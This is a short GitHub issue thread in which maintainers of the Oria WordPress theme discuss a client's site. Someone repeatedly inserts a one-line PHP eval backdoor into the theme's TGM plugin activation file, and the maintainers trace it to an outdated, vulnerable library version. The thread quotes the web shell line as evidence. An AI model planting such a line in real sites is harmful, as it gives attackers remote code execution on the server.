### ISSUE TITLE
hackattempt Oria

### ISSUE THREAD

**Issue by mileamadalin** [Codeinwp/oria#29]
@rodica-andronache we have this message from a client:

A rule <? Php @ eval ($ _POST ['dd']); ? > is regularly added at the top of the file l / wp-content / themes / oria / class-tgm-plugin-activation.php, resulting in going offline of the site. Do you recognize this problem and do you have a solution to it? The website is http://www.schijtaandegrens.nl and the host is https://www.xxlwebhosting.nl/

Can we fix that?

**Comment by rodica-andronache** [comment]
@mileamadalin I don't think this is related to our theme. I guess his site got hacked, and that it's why it's adding that code there. I'm not sure, he can maybe talk with the hosting. I don't think it's something we can do here

**Comment by ineagu** [comment]
is oria on the latest version, is tgma on the latest version ? pls to some investigation

**Comment by ineagu** [comment]
I know there were some vulnerable tgma versions in the past

**Comment by rodica-andronache** [comment]
@ineagu ok, you are right :) It's not the latest version. we'll update it
